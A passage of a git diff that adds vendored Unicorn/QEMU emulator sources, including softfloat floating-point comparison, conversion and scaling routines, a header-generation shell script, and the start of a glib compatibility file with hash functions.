aSig0 | aSig1 ) == 0 ) return a; + invalid: + float_raise( float_flag_invalid STATUS_VAR); + z.low = float128_default_nan_low; + z.high = float128_default_nan_high; + return z; + } + if ( aExp == 0 ) { + if ( ( aSig0 | aSig1 ) == 0 ) return packFloat128( 0, 0, 0, 0 ); + normalizeFloat128Subnormal( aSig0, aSig1, &aExp, &aSig0, &aSig1 ); + } + zExp = ( ( aExp - 0x3FFF )>>1 ) + 0x3FFE; + aSig0 |= LIT64( 0x0001000000000000 ); + zSig0 = estimateSqrt32( aExp, (uint32_t)(aSig0>>17) ); + shortShift128Left( aSig0, aSig1, 13 - ( aExp & 1 ), &aSig0, &aSig1 ); + zSig0 = estimateDiv128To64( aSig0, aSig1, zSig0<<32 ) + ( zSig0<<30 ); + doubleZSig0 = zSig0<<1; + mul64To128( zSig0, zSig0, &term0, &term1 ); + sub128( aSig0, aSig1, term0, term1, &rem0, &rem1 ); + while ( (int64_t) rem0 < 0 ) { + --zSig0; + doubleZSig0 -= 2; + add128( rem0, rem1, zSig0>>63, doubleZSig0 | 1, &rem0, &rem1 ); + } + zSig1 = estimateDiv128To64( rem1, 0, doubleZSig0 ); + if ( ( zSig1 & 0x1FFF ) <= 5 ) { + if ( zSig1 == 0 ) zSig1 = 1; + mul64To128( doubleZSig0, zSig1, &term1, &term2 ); + sub128( rem1, 0, term1, term2, &rem1, &rem2 ); + mul64To128( zSig1, zSig1, &term2, &term3 ); + sub192( rem1, rem2, 0, 0, term2, term3, &rem1, &rem2, &rem3 ); + while ( (int64_t) rem1 < 0 ) { + --zSig1; + shortShift128Left( 0, zSig1, 1, &term2, &term3 ); + term3 |= 1; + term2 |= doubleZSig0; + add192( rem1, rem2, rem3, 0, term2, term3, &rem1, &rem2, &rem3 ); + } + zSig1 |= ( ( rem1 | rem2 | rem3 ) != 0 ); + } + shift128ExtraRightJamming( zSig0, zSig1, 0, 14, &zSig0, &zSig1, &zSig2 ); + return roundAndPackFloat128( 0, zExp, zSig0, zSig1, zSig2 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the quadruple-precision floating-point value `a' is equal to +| the corresponding value `b', and 0 otherwise. The invalid exception is +| raised if either operand is a NaN. Otherwise, the comparison is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float128_eq( float128 a, float128 b STATUS_PARAM ) +{ + + if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) + && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) + || ( ( extractFloat128Exp( b ) == 0x7FFF ) + && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 0; + } + return + ( a.low == b.low ) + && ( ( a.high == b.high ) + || ( ( a.low == 0 ) + && ( (uint64_t) ( ( a.high | b.high )<<1 ) == 0 ) ) + ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the quadruple-precision floating-point value `a' is less than +| or equal to the corresponding value `b', and 0 otherwise. The invalid +| exception is raised if either operand is a NaN. The comparison is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float128_le( float128 a, float128 b STATUS_PARAM ) +{ + flag aSign, bSign; + + if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) + && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) + || ( ( extractFloat128Exp( b ) == 0x7FFF ) + && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 0; + } + aSign = extractFloat128Sign( a ); + bSign = extractFloat128Sign( b ); + if ( aSign != bSign ) { + return + aSign + || ( ( ( (uint64_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) + == 0 ); + } + return + aSign ? le128( b.high, b.low, a.high, a.low ) + : le128( a.high, a.low, b.high, b.low ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the quadruple-precision floating-point value `a' is less than +| the corresponding value `b', and 0 otherwise. The invalid exception is +| raised if either operand is a NaN. The comparison is performed according +| to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float128_lt( float128 a, float128 b STATUS_PARAM ) +{ + flag aSign, bSign; + + if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) + && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) + || ( ( extractFloat128Exp( b ) == 0x7FFF ) + && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 0; + } + aSign = extractFloat128Sign( a ); + bSign = extractFloat128Sign( b ); + if ( aSign != bSign ) { + return + aSign + && ( ( ( (uint64_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) + != 0 ); + } + return + aSign ? lt128( b.high, b.low, a.high, a.low ) + : lt128( a.high, a.low, b.high, b.low ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the quadruple-precision floating-point values `a' and `b' cannot +| be compared, and 0 otherwise. The invalid exception is raised if either +| operand is a NaN. The comparison is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float128_unordered( float128 a, float128 b STATUS_PARAM ) +{ + if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) + && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) + || ( ( extractFloat128Exp( b ) == 0x7FFF ) + && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 1; + } + return 0; +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the quadruple-precision floating-point value `a' is equal to +| the corresponding value `b', and 0 otherwise. Quiet NaNs do not cause an +| exception. The comparison is performed according to the IEC/IEEE Standard +| for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float128_eq_quiet( float128 a, float128 b STATUS_PARAM ) +{ + + if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) + && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) + || ( ( extractFloat128Exp( b ) == 0x7FFF ) + && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) + ) { + if ( float128_is_signaling_nan( a ) + || float128_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 0; + } + return + ( a.low == b.low ) + && ( ( a.high == b.high ) + || ( ( a.low == 0 ) + && ( (uint64_t) ( ( a.high | b.high )<<1 ) == 0 ) ) + ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the quadruple-precision floating-point value `a' is less than +| or equal to the corresponding value `b', and 0 otherwise. Quiet NaNs do not +| cause an exception. Otherwise, the comparison is performed according to the +| IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float128_le_quiet( float128 a, float128 b STATUS_PARAM ) +{ + flag aSign, bSign; + + if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) + && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) + || ( ( extractFloat128Exp( b ) == 0x7FFF ) + && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) + ) { + if ( float128_is_signaling_nan( a ) + || float128_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 0; + } + aSign = extractFloat128Sign( a ); + bSign = extractFloat128Sign( b ); + if ( aSign != bSign ) { + return + aSign + || ( ( ( (uint64_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) + == 0 ); + } + return + aSign ? le128( b.high, b.low, a.high, a.low ) + : le128( a.high, a.low, b.high, b.low ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the quadruple-precision floating-point value `a' is less than +| the corresponding value `b', and 0 otherwise. Quiet NaNs do not cause an +| exception. Otherwise, the comparison is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float128_lt_quiet( float128 a, float128 b STATUS_PARAM ) +{ + flag aSign, bSign; + + if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) + && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) + || ( ( extractFloat128Exp( b ) == 0x7FFF ) + && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) + ) { + if ( float128_is_signaling_nan( a ) + || float128_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 0; + } + aSign = extractFloat128Sign( a ); + bSign = extractFloat128Sign( b ); + if ( aSign != bSign ) { + return + aSign + && ( ( ( (uint64_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) + != 0 ); + } + return + aSign ? lt128( b.high, b.low, a.high, a.low ) + : lt128( a.high, a.low, b.high, b.low ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the quadruple-precision floating-point values `a' and `b' cannot +| be compared, and 0 otherwise. Quiet NaNs do not cause an exception. The +| comparison is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float128_unordered_quiet( float128 a, float128 b STATUS_PARAM ) +{ + if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) + && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) + || ( ( extractFloat128Exp( b ) == 0x7FFF ) + && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) + ) { + if ( float128_is_signaling_nan( a ) + || float128_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 1; + } + return 0; +} + +/* misc functions */ +float32 uint32_to_float32(uint32_t a STATUS_PARAM) +{ + return int64_to_float32(a STATUS_VAR); +} + +float64 uint32_to_float64(uint32_t a STATUS_PARAM) +{ + return int64_to_float64(a STATUS_VAR); +} + +uint32 float32_to_uint32( float32 a STATUS_PARAM ) +{ + int64_t v; + uint32 res; + int old_exc_flags = get_float_exception_flags(status); + + v = float32_to_int64(a STATUS_VAR); + if (v < 0) { + res = 0; + } else if (v > 0xffffffff) { + res = 0xffffffff; + } else { + return (uint32)v; + } + set_float_exception_flags(old_exc_flags STATUS_VAR); + float_raise(float_flag_invalid STATUS_VAR); + return res; +} + +uint32 float32_to_uint32_round_to_zero( float32 a STATUS_PARAM ) +{ + int64_t v; + uint32 res; + int old_exc_flags = get_float_exception_flags(status); + + v = float32_to_int64_round_to_zero(a STATUS_VAR); + if (v < 0) { + res = 0; + } else if (v > 0xffffffff) { + res = 0xffffffff; + } else { + return (uint32)v; + } + set_float_exception_flags(old_exc_flags, status); + float_raise(float_flag_invalid STATUS_VAR); + return res; +} + +int_fast16_t float32_to_int16(float32 a STATUS_PARAM) +{ + int32_t v; + int_fast16_t res; + int old_exc_flags = get_float_exception_flags(status); + + v = float32_to_int32(a STATUS_VAR); + if (v < -0x8000) { + res = -0x8000; + } else if (v > 0x7fff) { + res = 0x7fff; + } else { + return v; + } + + set_float_exception_flags(old_exc_flags, status); + float_raise(float_flag_invalid STATUS_VAR); + return res; +} + +uint_fast16_t float32_to_uint16(float32 a STATUS_PARAM) +{ + int32_t v; + uint_fast16_t res; + int old_exc_flags = get_float_exception_flags(status); + + v = float32_to_int32(a STATUS_VAR); + if (v < 0) { + res = 0; + } else if (v > 0xffff) { + res = 0xffff; + } else { + return v; + } + + set_float_exception_flags(old_exc_flags, status); + float_raise(float_flag_invalid STATUS_VAR); + return res; +} + +uint_fast16_t float32_to_uint16_round_to_zero(float32 a STATUS_PARAM) +{ + int64_t v; + uint_fast16_t res; + int old_exc_flags = get_float_exception_flags(status); + + v = float32_to_int64_round_to_zero(a STATUS_VAR); + if (v < 0) { + res = 0; + } else if (v > 0xffff) { + res = 0xffff; + } else { + return (uint_fast16_t)v; + } + set_float_exception_flags(old_exc_flags, status); + float_raise(float_flag_invalid STATUS_VAR); + return res; +} + +uint32 float64_to_uint32( float64 a STATUS_PARAM ) +{ + uint64_t v; + uint32 res; + int old_exc_flags = get_float_exception_flags(status); + + v = float64_to_uint64(a STATUS_VAR); + if (v > 0xffffffff) { + res = 0xffffffff; + } else { + return (uint32)v; + } + set_float_exception_flags(old_exc_flags, status); + float_raise(float_flag_invalid STATUS_VAR); + return res; +} + +uint32 float64_to_uint32_round_to_zero( float64 a STATUS_PARAM ) +{ + uint64_t v; + uint32 res; + int old_exc_flags = get_float_exception_flags(status); + + v = float64_to_uint64_round_to_zero(a STATUS_VAR); + if (v > 0xffffffff) { + res = 0xffffffff; + } else { + return (uint32)v; + } + set_float_exception_flags(old_exc_flags, status); + float_raise(float_flag_invalid STATUS_VAR); + return res; +} + +int_fast16_t float64_to_int16(float64 a STATUS_PARAM) +{ + int64_t v; + int_fast16_t res; + int old_exc_flags = get_float_exception_flags(status); + + v = float64_to_int32(a STATUS_VAR); + if (v < -0x8000) { + res = -0x8000; + } else if (v > 0x7fff) { + res = 0x7fff; + } else { + return (int_fast16_t)v; + } + + set_float_exception_flags(old_exc_flags, status); + float_raise(float_flag_invalid STATUS_VAR); + return res; +} + +uint_fast16_t float64_to_uint16(float64 a STATUS_PARAM) +{ + int64_t v; + uint_fast16_t res; + int old_exc_flags = get_float_exception_flags(status); + + v = float64_to_int32(a STATUS_VAR); + if (v < 0) { + res = 0; + } else if (v > 0xffff) { + res = 0xffff; + } else { + return (uint_fast16_t)v; + } + + set_float_exception_flags(old_exc_flags, status); + float_raise(float_flag_invalid STATUS_VAR); + return res; +} + +uint_fast16_t float64_to_uint16_round_to_zero(float64 a STATUS_PARAM) +{ + int64_t v; + uint_fast16_t res; + int old_exc_flags = get_float_exception_flags(status); + + v = float64_to_int64_round_to_zero(a STATUS_VAR); + if (v < 0) { + res = 0; + } else if (v > 0xffff) { + res = 0xffff; + } else { + return (uint_fast16_t)v; + } + set_float_exception_flags(old_exc_flags, status); + float_raise(float_flag_invalid STATUS_VAR); + return res; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the double-precision floating-point value +| `a' to the 64-bit unsigned integer format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic---which means in particular that the conversion is rounded +| according to the current rounding mode. If `a' is a NaN, the largest +| positive integer is returned. If the conversion overflows, the +| largest unsigned integer is returned. If 'a' is negative, the value is +| rounded and zero is returned; negative values that do not round to zero +| will raise the inexact exception. +*----------------------------------------------------------------------------*/ + +uint64_t float64_to_uint64(float64 a STATUS_PARAM) +{ + flag aSign; + int_fast16_t aExp, shiftCount; + uint64_t aSig, aSigExtra; + a = float64_squash_input_denormal(a STATUS_VAR); + + aSig = extractFloat64Frac(a); + aExp = extractFloat64Exp(a); + aSign = extractFloat64Sign(a); + if (aSign && (aExp > 1022)) { + float_raise(float_flag_invalid STATUS_VAR); + if (float64_is_any_nan(a)) { + return LIT64(0xFFFFFFFFFFFFFFFF); + } else { + return 0; + } + } + if (aExp) { + aSig |= LIT64(0x0010000000000000); + } + shiftCount = 0x433 - aExp; + if (shiftCount <= 0) { + if (0x43E < aExp) { + float_raise(float_flag_invalid STATUS_VAR); + return LIT64(0xFFFFFFFFFFFFFFFF); + } + aSigExtra = 0; + aSig <<= -shiftCount; + } else { + shift64ExtraRightJamming(aSig, 0, shiftCount, &aSig, &aSigExtra); + } + return roundAndPackUint64(aSign, aSig, aSigExtra STATUS_VAR); +} + +uint64_t float64_to_uint64_round_to_zero (float64 a STATUS_PARAM) +{ + int64_t v; + signed char current_rounding_mode = STATUS(float_rounding_mode); + set_float_rounding_mode(float_round_to_zero STATUS_VAR); + v = float64_to_uint64(a STATUS_VAR); + set_float_rounding_mode(current_rounding_mode STATUS_VAR); + return v; +} + +#define COMPARE(s, nan_exp) \ +static inline int float ## s ## _compare_internal( float ## s a, float ## s b, \ + int is_quiet STATUS_PARAM ) \ +{ \ + flag aSign, bSign; \ + uint ## s ## _t av, bv; \ + a = float ## s ## _squash_input_denormal(a STATUS_VAR); \ + b = float ## s ## _squash_input_denormal(b STATUS_VAR); \ + \ + if (( ( extractFloat ## s ## Exp( a ) == nan_exp ) && \ + extractFloat ## s ## Frac( a ) ) || \ + ( ( extractFloat ## s ## Exp( b ) == nan_exp ) && \ + extractFloat ## s ## Frac( b ) )) { \ + if (!is_quiet || \ + float ## s ## _is_signaling_nan( a ) || \ + float ## s ## _is_signaling_nan( b ) ) { \ + float_raise( float_flag_invalid STATUS_VAR); \ + } \ + return float_relation_unordered; \ + } \ + aSign = extractFloat ## s ## Sign( a ); \ + bSign = extractFloat ## s ## Sign( b ); \ + av = float ## s ## _val(a); \ + bv = float ## s ## _val(b); \ + if ( aSign != bSign ) { \ + if ( (uint ## s ## _t) ( ( av | bv )<<1 ) == 0 ) { \ + /* zero case */ \ + return float_relation_equal; \ + } else { \ + return 1 - (2 * aSign); \ + } \ + } else { \ + if (av == bv) { \ + return float_relation_equal; \ + } else { \ + return 1 - 2 * (aSign ^ ( av < bv )); \ + } \ + } \ +} \ + \ +int float ## s ## _compare( float ## s a, float ## s b STATUS_PARAM ) \ +{ \ + return float ## s ## _compare_internal(a, b, 0 STATUS_VAR); \ +} \ + \ +int float ## s ## _compare_quiet( float ## s a, float ## s b STATUS_PARAM ) \ +{ \ + return float ## s ## _compare_internal(a, b, 1 STATUS_VAR); \ +} + +COMPARE(32, 0xff) +COMPARE(64, 0x7ff) + +static inline int floatx80_compare_internal( floatx80 a, floatx80 b, + int is_quiet STATUS_PARAM ) +{ + flag aSign, bSign; + + if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { + float_raise(float_flag_invalid STATUS_VAR); + return float_relation_unordered; + } + if (( ( extractFloatx80Exp( a ) == 0x7fff ) && + ( extractFloatx80Frac( a )<<1 ) ) || + ( ( extractFloatx80Exp( b ) == 0x7fff ) && + ( extractFloatx80Frac( b )<<1 ) )) { + if (!is_quiet || + floatx80_is_signaling_nan( a ) || + floatx80_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return float_relation_unordered; + } + aSign = extractFloatx80Sign( a ); + bSign = extractFloatx80Sign( b ); + if ( aSign != bSign ) { + + if ( ( ( (uint16_t) ( ( a.high | b.high ) << 1 ) ) == 0) && + ( ( a.low | b.low ) == 0 ) ) { + /* zero case */ + return float_relation_equal; + } else { + return 1 - (2 * aSign); + } + } else { + if (a.low == b.low && a.high == b.high) { + return float_relation_equal; + } else { + return 1 - 2 * (aSign ^ ( lt128( a.high, a.low, b.high, b.low ) )); + } + } +} + +int floatx80_compare( floatx80 a, floatx80 b STATUS_PARAM ) +{ + return floatx80_compare_internal(a, b, 0 STATUS_VAR); +} + +int floatx80_compare_quiet( floatx80 a, floatx80 b STATUS_PARAM ) +{ + return floatx80_compare_internal(a, b, 1 STATUS_VAR); +} + +static inline int float128_compare_internal( float128 a, float128 b, + int is_quiet STATUS_PARAM ) +{ + flag aSign, bSign; + + if (( ( extractFloat128Exp( a ) == 0x7fff ) && + ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) || + ( ( extractFloat128Exp( b ) == 0x7fff ) && + ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) )) { + if (!is_quiet || + float128_is_signaling_nan( a ) || + float128_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return float_relation_unordered; + } + aSign = extractFloat128Sign( a ); + bSign = extractFloat128Sign( b ); + if ( aSign != bSign ) { + if ( ( ( ( a.high | b.high )<<1 ) | a.low | b.low ) == 0 ) { + /* zero case */ + return float_relation_equal; + } else { + return 1 - (2 * aSign); + } + } else { + if (a.low == b.low && a.high == b.high) { + return float_relation_equal; + } else { + return 1 - 2 * (aSign ^ ( lt128( a.high, a.low, b.high, b.low ) )); + } + } +} + +int float128_compare( float128 a, float128 b STATUS_PARAM ) +{ + return float128_compare_internal(a, b, 0 STATUS_VAR); +} + +int float128_compare_quiet( float128 a, float128 b STATUS_PARAM ) +{ + return float128_compare_internal(a, b, 1 STATUS_VAR); +} + +/* min() and max() functions. These can't be implemented as + * 'compare and pick one input' because that would mishandle + * NaNs and +0 vs -0. + * + * minnum() and maxnum() functions. These are similar to the min() + * and max() functions but if one of the arguments is a QNaN and + * the other is numerical then the numerical argument is returned. + * minnum() and maxnum correspond to the IEEE 754-2008 minNum() + * and maxNum() operations. min() and max() are the typical min/max + * semantics provided by many CPUs which predate that specification. + * + * minnummag() and maxnummag() functions correspond to minNumMag() + * and minNumMag() from the IEEE-754 2008. + */ +#define MINMAX(s) \ +static inline float ## s float ## s ## _minmax(float ## s a, float ## s b, \ + int ismin, int isieee, \ + int ismag STATUS_PARAM) \ +{ \ + flag aSign, bSign; \ + uint ## s ## _t av, bv, aav, abv; \ + a = float ## s ## _squash_input_denormal(a STATUS_VAR); \ + b = float ## s ## _squash_input_denormal(b STATUS_VAR); \ + if (float ## s ## _is_any_nan(a) || \ + float ## s ## _is_any_nan(b)) { \ + if (isieee) { \ + if (float ## s ## _is_quiet_nan(a) && \ + !float ## s ##_is_any_nan(b)) { \ + return b; \ + } else if (float ## s ## _is_quiet_nan(b) && \ + !float ## s ## _is_any_nan(a)) { \ + return a; \ + } \ + } \ + return propagateFloat ## s ## NaN(a, b STATUS_VAR); \ + } \ + aSign = extractFloat ## s ## Sign(a); \ + bSign = extractFloat ## s ## Sign(b); \ + av = float ## s ## _val(a); \ + bv = float ## s ## _val(b); \ + if (ismag) { \ + aav = float ## s ## _abs(av); \ + abv = float ## s ## _abs(bv); \ + if (aav != abv) { \ + if (ismin) { \ + return (aav < abv) ? a : b; \ + } else { \ + return (aav < abv) ? b : a; \ + } \ + } \ + } \ + if (aSign != bSign) { \ + if (ismin) { \ + return aSign ? a : b; \ + } else { \ + return aSign ? b : a; \ + } \ + } else { \ + if (ismin) { \ + return (aSign ^ (av < bv)) ? a : b; \ + } else { \ + return (aSign ^ (av < bv)) ? b : a; \ + } \ + } \ +} \ + \ +float ## s float ## s ## _min(float ## s a, float ## s b STATUS_PARAM) \ +{ \ + return float ## s ## _minmax(a, b, 1, 0, 0 STATUS_VAR); \ +} \ + \ +float ## s float ## s ## _max(float ## s a, float ## s b STATUS_PARAM) \ +{ \ + return float ## s ## _minmax(a, b, 0, 0, 0 STATUS_VAR); \ +} \ + \ +float ## s float ## s ## _minnum(float ## s a, float ## s b STATUS_PARAM) \ +{ \ + return float ## s ## _minmax(a, b, 1, 1, 0 STATUS_VAR); \ +} \ + \ +float ## s float ## s ## _maxnum(float ## s a, float ## s b STATUS_PARAM) \ +{ \ + return float ## s ## _minmax(a, b, 0, 1, 0 STATUS_VAR); \ +} \ + \ +float ## s float ## s ## _minnummag(float ## s a, float ## s b STATUS_PARAM) \ +{ \ + return float ## s ## _minmax(a, b, 1, 1, 1 STATUS_VAR); \ +} \ + \ +float ## s float ## s ## _maxnummag(float ## s a, float ## s b STATUS_PARAM) \ +{ \ + return float ## s ## _minmax(a, b, 0, 1, 1 STATUS_VAR); \ +} + +MINMAX(32) +MINMAX(64) + + +/* Multiply A by 2 raised to the power N. */ +float32 float32_scalbn( float32 a, int n STATUS_PARAM ) +{ + flag aSign; + int16_t aExp; + uint32_t aSig; + + a = float32_squash_input_denormal(a STATUS_VAR); + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + + if ( aExp == 0xFF ) { + if ( aSig ) { + return propagateFloat32NaN( a, a STATUS_VAR ); + } + return a; + } + if (aExp != 0) { + aSig |= 0x00800000; + } else if (aSig == 0) { + return a; + } else { + aExp++; + } + + if (n > 0x200) { + n = 0x200; + } else if (n < -0x200) { + n = -0x200; + } + + aExp += n - 1; + aSig <<= 7; + return normalizeRoundAndPackFloat32( aSign, aExp, aSig STATUS_VAR ); +} + +float64 float64_scalbn( float64 a, int n STATUS_PARAM ) +{ + flag aSign; + int16_t aExp; + uint64_t aSig; + + a = float64_squash_input_denormal(a STATUS_VAR); + aSig = extractFloat64Frac( a ); + aExp = extractFloat64Exp( a ); + aSign = extractFloat64Sign( a ); + + if ( aExp == 0x7FF ) { + if ( aSig ) { + return propagateFloat64NaN( a, a STATUS_VAR ); + } + return a; + } + if (aExp != 0) { + aSig |= LIT64( 0x0010000000000000 ); + } else if (aSig == 0) { + return a; + } else { + aExp++; + } + + if (n > 0x1000) { + n = 0x1000; + } else if (n < -0x1000) { + n = -0x1000; + } + + aExp += n - 1; + aSig <<= 10; + return normalizeRoundAndPackFloat64( aSign, aExp, aSig STATUS_VAR ); +} + +floatx80 floatx80_scalbn( floatx80 a, int n STATUS_PARAM ) +{ + flag aSign; + int32_t aExp; + uint64_t aSig; + + if (floatx80_invalid_encoding(a)) { + float_raise(float_flag_invalid STATUS_VAR); + return floatx80_default_nan; + } + aSig = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + aSign = extractFloatx80Sign( a ); + + if ( aExp == 0x7FFF ) { + if ( aSig<<1 ) { + return propagateFloatx80NaN( a, a STATUS_VAR ); + } + return a; + } + + if (aExp == 0) { + if (aSig == 0) { + return a; + } + aExp++; + } + + if (n > 0x10000) { + n = 0x10000; + } else if (n < -0x10000) { + n = -0x10000; + } + + aExp += n; + return normalizeRoundAndPackFloatx80( STATUS(floatx80_rounding_precision), + aSign, aExp, aSig, 0 STATUS_VAR ); +} + +float128 float128_scalbn( float128 a, int n STATUS_PARAM ) +{ + flag aSign; + int32_t aExp; + uint64_t aSig0, aSig1; + + aSig1 = extractFloat128Frac1( a ); + aSig0 = extractFloat128Frac0( a ); + aExp = extractFloat128Exp( a ); + aSign = extractFloat128Sign( a ); + if ( aExp == 0x7FFF ) { + if ( aSig0 | aSig1 ) { + return propagateFloat128NaN( a, a STATUS_VAR ); + } + return a; + } + if (aExp != 0) { + aSig0 |= LIT64( 0x0001000000000000 ); + } else if (aSig0 == 0 && aSig1 == 0) { + return a; + } else { + aExp++; + } + + if (n > 0x10000) { + n = 0x10000; + } else if (n < -0x10000) { + n = -0x10000; + } + + aExp += n - 1; + return normalizeRoundAndPackFloat128( aSign, aExp, aSig0, aSig1 + STATUS_VAR ); + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/gen_all_header.sh b/ai_anti_malware/unicorn/unicorn-master/qemu/gen_all_header.sh new file mode 100644 index 0000000..1330ae5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/gen_all_header.sh @@ -0,0 +1,4 @@ +#!/bin/sh +for d in x86_64 arm armeb m68k aarch64 aarch64eb mips mipsel mips64 mips64el sparc sparc64; do + python header_gen.py $d > $d.h +done diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/glib_compat.c b/ai_anti_malware/unicorn/unicorn-master/qemu/glib_compat.c new file mode 100644 index 0000000..946e4f0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/glib_compat.c @@ -0,0 +1,1457 @@ +/* +glib_compat.c replacement functionality for glib code used in qemu +Copyright (C) 2016 Chris Eagle cseagle at gmail dot com + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +as published by the Free Software Foundation; either version 2 +of the License, or (at your option) any later version. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. +*/ + +// Part of this code was lifted from glib-2.28.0. +// Glib license is available in COPYING_GLIB file in root directory. + +#ifndef _GNU_SOURCE +#define _GNU_SOURCE +#endif + +#include <string.h> +#include <stdlib.h> +#include <stdio.h> +#include <limits.h> + +#include "glib_compat.h" + +#define MAX(a, b) (((a) > (b)) ? (a) : (b)) +#ifndef _WIN64 +#define GPOINTER_TO_UINT(p) ((guint)(uintptr_t)(p)) +#else +#define GPOINTER_TO_UINT(p) ((guint) (guint64) (p)) +#endif +#define G_MAXINT INT_MAX + +/* All functions below added to eliminate GLIB dependency */ + +/* hashing and equality functions */ +// Hash functions lifted glib-2.28.0/glib/ghash.c + +/** + * g_direct_hash: + * @v: a #gpointer key + * + * Converts a gpointer to a hash value. + * It can be passed to g_hash_table_new() as the @hash_func parameter, + * when using pointers as keys in a #GHashTable. + * + * Returns: a hash value corresponding to the key. + */ +static guint g_direct_hash (gconstpointer v) +{ + return GPOINTER_TO_UINT (v); +} + +// g_str_hash() is lifted glib-2.28.0/glib/gstring.c +/** + * g_str_hash: + * @v: a string key + * + * Converts a string to a hash value. + * + * This function implements the widely used "djb" hash apparently posted + * by Daniel Bernstein to comp.lang.c some time ago. The 32 bit + * unsigned hash value starts at 5381 and for each byte 'c' in the + * string, is updated: <literal>hash = hash * 33 + c</literal>. This + * function uses the signed value of each byte. + * + * It can be passed to g_hash_table_new() as the @hash_func parameter, + * when using strings as keys in a #GHashTable. + * + * Returns: a hash value corresponding to the key + **/ +guint g_str_hash (gconstpointer v) +{ + const signed char *p; + guint32 h = 5381; + + for (p = v; *p != '\0'; p++) + h = (h << 5) + h + *p; + + return h; +} + +gboolean g_str_equal(gconstpointer v1, gconstpointer v2) +{ + return strcmp((const char*)v1, (const char*)v2) == 0; +} + +// g_int_hash() is lifted from glib-2.28.0/glib/gutils.c +/** + * g_int_hash: + * @v: a pointer to a #gint key + * + * Converts a pointer to a #gint to a hash value. + * It can be passed to g_hash_table_new() as the @hash_func parameter, + * when using pointers to integers values as keys in a #GHashTable. + * + * Returns: a hash value corresponding to the key. + */ +guint g_int_hash (gconstpointer v) +{ + return *(const gint*) v; +} + +gboolean g_int_equal(gconstpointer v1, gconstpointer v2) +{ + return *((const gint*)v1) == *((const 